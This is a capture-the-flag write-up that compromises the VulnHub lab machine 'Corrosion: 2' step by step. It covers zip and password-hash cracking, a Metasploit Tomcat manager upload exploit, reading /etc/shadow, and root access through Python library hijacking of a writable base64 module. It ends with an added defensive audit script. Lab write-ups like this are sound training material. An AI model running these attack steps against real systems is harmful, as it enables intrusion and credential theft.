# Corrosion: 2 VulnHub WriteUp

<figure><img src="/files/Thlh5xrOSknDQ92gLFPX" alt=""><figcaption><p>Every lab, every wallpaper</p></figcaption></figure>

Proxy Programmer’s Corrosion: 2 is a Vulnhub medium machine.\
This lab is designed for experienced CTF players who want to put their abilities to the test in a variety of situations. So, let’s get started and see how we can break things down into smaller chunks.

### Download

* **Corrosion2.ova** (Size: 5.1 GB)
* **Download (Mirror)**: <https://download.vulnhub.com/corrosion/Corrosion2.ova>

### Pentest Methodology

**Network Scanning**

* netdiscover
* nmap

**Enumeration**

* dirb
* fcrackzip

**Exploitation**

* Metasploit
* /etc/shadow
* john

**Privilege Escalation**

* ssh
* python library hijacking
* root flag

**Level: Medium**

### Network Scanning

To begin, we must use the **netdiscover** command to scan the network for the target machine’s IP address.

```shell
netdiscover
```

The victim’s IP address, in this case, is **192.168.1.186**.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEjKk1onqg5P0J4wEqrg4ux3lc7rb9UtC8vfivCFdfsIWyQXZff-DFJXiAORTaqsqwTmPZx5nrd9hBDaiG3hPTZ8UFT3Oo0RiIRfuOfWgD2BKtHHR0Nq0fhaqvPcvHjkVgcuaxTZ0q2wAxEeFURQo61PqzudWaID_Dqm0hlbX52eIZ8HGqFFGPxoRxSOug=s16000" alt=""><figcaption></figcaption></figure>

We’re going to use **Nmap** to help us move this process along. A version scan tells us which services are listening on the target and what software is behind them.

```shell
nmap -sV 192.168.1.186
```

According to the nmap output, we have:

* An SSH server is available on port 22.
* On port 80, there is an HTTP service (Apache Server).
* On port 8080, a Tomcat server is running.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEjFUCr4h9LxT6BnsA6tAhdUYzdpcVrnUI9dMyHNW65zRm6Odv3JxSeuXttNbWqmF_7wS7PFdHxEd7LJet4JxN_W-1gzH5KvwK_B_l-iy_kPEuy7tdCbx7jj2d3zwAEuGZbHCpC1uyk_tWVxUoDYloT-ssTtryBPvXfFzWJHHfN-N65fZLvmdnLxAySTOw=s16000" alt=""><figcaption></figcaption></figure>

### Enumeration

Let’s begin by looking at the http service on port **80**. There’s nothing strange about that; it’s just an **Apache server page.**

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEj54r-dtA2Td_EreVBny2CnBsqg297VfT88nOhnFmg8CJirwXme8CkHlvtf9Q6mfDTbMAkajh6wNryxyw_eEE6fZTz2rHTC6GOHQ56AnElwXg3auNh8NBw4u7vPpmGpSVx_MstpZgd0WfPykQ0niRWjC7TBGkyyuEw9Z03lW15eJarU_B1iAT74Ikt0cg=s16000" alt=""><figcaption></figcaption></figure>

Next, we looked at the **Tomcat server**, which was listening on port **8080**. It’s a straightforward page with nothing suspicious on it.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEh3LcjmoRYHLidzX4MvSY4eMlxzhe02gpg_pLtCWnvdQ2B12kObNphP-JASceSs5iQVxle417G3m2XQBJ6gL_wvhxl4_rOI5tRlsgBlvqbxMFYEG87n9UePZtLcuwhlcAOkwPOFpX8gGCBQ7_1f7fk5wv-HVRJBSFWXJumH-YgbHhN0tfzINefS2mzFyg=s16000" alt=""><figcaption></figcaption></figure>

We discovered nothing harmful on either website. So, to continue further in this experiment, we use **dirb** to brute force directories and files on the Tomcat server. Smash!! We discovered a **backup zip file**.

```bash
dirb http://192.168.1.186:8080/ -X .php,.zip
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEivYUcRnvTmVMoAefYSQDiTk8ObWNULLNYpj3evT59FuIoO39u2GOqtfpypZ8-jv676-H0X2UxmF7EgkYr3MtNPplBZlwye3F405YGP522yoZPMV0x8462KI5de3jiyiEMLwb5LE-fmhvMc_sq28uA_qki39HqOKIXOofn_eiFBICTC08GFWfSYJQVQlA=s16000" alt=""><figcaption></figcaption></figure>

The **backup zip file** is then downloaded using the **wget** command. Following that, we attempted to study this file, but it was **password protected**.

{% code lineNumbers="true" %}

```shell
wget http://192.168.1.186:8080/backup.zip
unzip backup.zip
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEgM1XNQw9_EzbADCJTb-wlaBJEoQisGsd3EeAY1cBkKj1i2ajrzdytKfXAruWt_CGAiN5V69FQ86WmEUwrxmxDhIZhwn1X9ky52RWBf2PUa_MvNsnLb_9TExlMPwc-g19QJI6Ized9Hg9DVa_MWHLr2yjWk8xWWWCHDYVH4f6t0alPwsRoQ3-qR3SjJDQ=s16000" alt=""><figcaption></figcaption></figure>

Next, we’ll use the **fcrackzip** utility to crack this password. It is a lightweight, open-source zip file password cracker. The **rockyou** word-list is used for the brute force attack. Boom!! We cracked its password in a matter of seconds **(@administrator\_hi5).**

```shell
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip
```

Then we use this password to unzip the **backup zip** file and inspect each file it contains. The interesting one is **tomcat-users.xml**, which holds the Tomcat manager credentials.

{% code lineNumbers="true" %}

```shell
unzip backup.zip
cat tomcat-users.xml
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEi9oeyicwDyWMaMCXtq8RGEi-3zD-Socl4-ycbU3avaccjVA8ORsboGgevbnVkWiGfk8NMoIDJaGIpRbwjJ7z-EmNjqn1kD8gJB1e3C0M8UpKEdNYlkSQRr7gkWHQrk0Ms1BO2Nb0BlfHaws77hoHjEk6jp_2_MxRDffc-EyaLM7oJJ1aUNf9wBDpwB0w=s16000" alt=""><figcaption></figcaption></figure>

Bam!! We discovered user **admin** and password **melehifokivai** credentials.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEiztI5WuE5M1_Sta3tZ4waTHkdHBo0_OI1dj7bTeRexWODqUoJdjAPSScZzecjTDPV6Ku2cn9ut9fN3WL2z2m3WpU-xebq5qyTgwz_VrW2-L9U5NthHKHVmT-exmHL0iyXK-nwbJ4RDFBt2gLPDiVVAjO8v5xdyl4sQV_c66rTZ_10MplcGLch38Pji7g=s16000" alt=""><figcaption></figcaption></figure>

### Exploitation

Now that we have the credentials, we can begin exploiting them using **Metasploit**. In these instances, the **Tomcat manager upload exploit** is the best option. We set the options it needs (target host and port plus the Tomcat credentials) and run it. As you can see, we obtained a **meterpreter session**.

{% code lineNumbers="true" %}

```shell
use exploit/multi/http/tomcat_mgr_upload
set rhosts 192.168.1.186
set rport 8080
set httpusername admin
set httppassword melehifokivai
exploit
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEiGj92boUJBX0CVzYS9bromIAyIbcd9DXHHI4d01HBaoxvecun1NG_gPY2nTe6RJxvxGBL2qejkOXnnfTn1jmnymcOSvCjtqZMgCOM9os9qRN4uh5iMMkBg77kzughkaXU9_3U-Z28d1LAwrryfMKlBmpKhmzHoY1-eoO2FXUxAyIyljhFrdCCI7ISkvg=s16000" alt=""><figcaption></figcaption></figure>

We just switched the directory to home. We discover that we have two users in this lab, **Jaye** and **Randy.** We switched to user **jaye.** It has the same password **(melehifokivai)** that we found out earlier.

{% code lineNumbers="true" %}

```shell
cd /home
ls
su jaye
ls
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEjLEtiMgoOVz41sveSwTcw9xL7noY5ySUHyHSlBraS1-w31TjtdcEyZzes2B2uXc-as0XWzKUG5Axev7J1nLMUwZaa8koA3yV7GbLeskWw-67iunRaR8LctAP8QMU-nJIbbDCr0_0qCKlppcIT2KVWaJ4vSjjscYEvUW_H25ky34IwIj41uP_FRsHxjCg=s16000" alt=""><figcaption></figcaption></figure>

We discovered that this user’s home directory contains a program called **look** that allows us to read any file. As a result, we use it to read the **/etc/shadow file**. Boom!! We obtained the **password hashes** of all users in this lab.

```shell
./look '' /etc/shadow
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEiGjTeUA-Fyk-xVvS2Qql9rYylMJ2p1eIZIGQoFLPa3w5WqxnWajuvmvmcpDC8YiLKaCxCMbUFIm04a0yVRUjz4j0eEvmG9EljhS5yA_OE3iHTESgQXRyup1oXfBN6cIKQiPCpFCk1oLClF6jvQbrFqq6dfT0UJkCgcd5qOdvsyRIwUp0ZmA8QwBiFMcw=s16000" alt=""><figcaption></figcaption></figure>

As you are aware, we already have the password for user Jaye. We copy user **randy’s hash value** and save it in a file called hash.

Using **John the Ripper**, the specialist for this job, we try to crack that hash. In a matter of seconds, we cracked the password **07051986randy.**

```shell
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEiMkuQCR3EMVH468xCy-YLUkoxS79qXoJDul_x_8ztOOx_lRN63aL9tb0p22erD4bjFPFfIuHvLtHKfkREBGJeN3DaxI5J5uHnG_gJJ1OGcueaE8QdN4H3lx4QnNrR73fo3JXPJ4CtBFUDprxT7Q8gWlalTA1myJXtaefyYiv6bjt9SQPqKnyH5NOonJw=s16000" alt=""><figcaption></figcaption></figure>

### Privilege Escalation

Now, we have all of the necessary information to begin privilege escalation. To login via ssh as user **randy,** we use the cracked password **07051986randy.**

```shell
ssh randy@192.168.1.186
```

Then we used **sudo -l** to list this user’s sudo privileges. We discovered that they can be abused by **python library hijacking**.

The script **randombase64.py**, which randy may run as root via sudo, imports the standard **base64** module. If the module file that Python loads is writable by us, whatever we add to it runs as root when the script is executed with sudo.

{% code lineNumbers="true" %}

```shell
sudo -l
cat /home/randy/randombase64.py
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEiGJlFibtP3Rvm68cwnmhjBuC_ZPfKErWxwLaPX3IpTS0i2rrmAvDOCRkAuasFz6HS7Sv5H0b8TeHq6mMcaIr5NAybVRxmRKh8LYjzX3sYsXUgfcqJ5_qRGhAu5YKLKDAHAg5kdpelVpqgU7KKjq3JV00E3V8sRa63JENSNehirkJxVkq7YePWI85nHoA=s16000" alt=""><figcaption></figcaption></figure>

To find where the **base64** module lives on disk, we use the **locate** command. In a couple of seconds, we discover its location. We then checked the file’s permissions and found that it is writable. Using this file, we can gain **root access.**

{% code lineNumbers="true" %}

```shell
locate base64
ls -la /usr/lib/python3.8/base64.py
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEgFMMm8JJSJRUVQJbI1a6sGv641vEY4n2_9nv0MygnQPelYbVgQLIMtsidOL26Js6ezCTVnLUnq4MWmApfRVBpsgXtu-cg4PNnEV04fIbhYlRs7DZ3pDoYp62UUBXQnRtCIcnoXwfS0dwdMSPRufkHZj-9kqlwK2inNAva_heFvzOhvcIVF7t8clgDzQg=s16000" alt=""><figcaption></figcaption></figure>

We made some changes to this **base64 python file** using the nano command. Add this code to get **root access** to the victim’s machine.

```python
import os
os.system ("/bin/bash")
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEi-6EwkZ9qHj9FD6Wg8PG1pbJnqtf1aZFLv8dqgEKSRI-rD5EuOl59qYmVEiEVPmqC2hJRnk7vgLbFuOAWeXJrCm_8pMIATGcaOFn1h4llwn_0VrI8BdBfb6z3_FRwRp6qCizRwS3C_-7Ja3oOZFUtOJlowQK39jgzKGpMgt53kvIrAtcwGqcpy97b4Vg=s16000" alt=""><figcaption></figcaption></figure>

Now we run the sudo-permitted script, which imports our modified **base64** module. Boom!! We obtained root access. We immediately changed the directory to **root** and received the **root flag** in a matter of seconds.

{% code lineNumbers="true" %}

```shell
sudo /usr/bin/python3.8 /home/randy/randombase64.py
cd /root
cat root.txt
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhBRjkN4kBHQLrByzbtz8vywMGjzDtnFEX9Y-W7TGt1PH4BgX7aWC6MsBcOuY0HInPf5JEBCyIKuCcmNT1QCidFWwVwL4QOyJG-NqXH2JyGzMQcEb3kvSk4Ff0L9U0gJ5U5Lydgb-1FjT-oOZ7aCVeWqqrDiReTUU2IVe-CBxrQyRewoPvXo-EUAqgC1g=s16000" alt=""><figcaption></figcaption></figure>
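The hijack above works only because a module imported by a sudo-permitted script lived in a file a low-privileged user could edit. The following audit script is an added example (not part of the original writeup) that parses a script’s imports, resolves each module on a given search path in `sys.path` order, and flags module files or directories that are group- or world-writable; the temp-dir layout it builds in `demo()` is constructed to mirror the writable `base64.py` found on the box.

```python
# Added example (not from the writeup): audit which imports of a
# sudo-permitted script resolve to module files a non-root user could
# modify, i.e. the condition that made randombase64.py hijackable.
# Paths are constructed in a temp dir for the demo.
import ast
import os
import tempfile

def imported_modules(source):
    """Top-level module names imported anywhere in the script."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and not node.level:
            names.add(node.module.split(".")[0])
    return sorted(names)

def resolve(module, search_paths):
    """First module file on the search path, mirroring sys.path order."""
    for base in search_paths:
        for cand in (os.path.join(base, module + ".py"),
                     os.path.join(base, module, "__init__.py")):
            if os.path.isfile(cand):
                return cand
    return None

def is_tamperable(path):
    """True if the module file or its directory is group/world-writable (0o022 bits)."""
    mask = 0o022
    return any(os.stat(p).st_mode & mask for p in (path, os.path.dirname(path)))

def audit(script_source, search_paths):
    """Map each import to (resolved path, hijackable?); unresolved imports are (None, False)."""
    findings = {}
    for mod in imported_modules(script_source):
        path = resolve(mod, search_paths)
        findings[mod] = (path, path is not None and is_tamperable(path))
    return findings

def demo():
    # Constructed layout: a fake library dir holding a world-writable base64.py.
    lib = os.path.join(tempfile.mkdtemp(), "lib")
    os.makedirs(lib, mode=0o755)
    b64 = os.path.join(lib, "base64.py")
    with open(b64, "w") as f:
        f.write("# stand-in for the real module\n")
    os.chmod(b64, 0o666)
    return audit("import base64, os\nprint(base64.b64encode(os.urandom(8)))\n", [lib])
```

Running the same audit against the real script with `sys.path` of the interpreter named in the sudo rule (here `/usr/bin/python3.8`) tells a defender exactly which files need their permissions fixed; ownership by the invoking user is the other case worth checking.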

This was a fantastic lab with a lot of information, especially in the enumeration and privilege escalation areas. It is worthwhile to attempt in order to gain CTF experience. Hopefully this walk-through taught you something new.

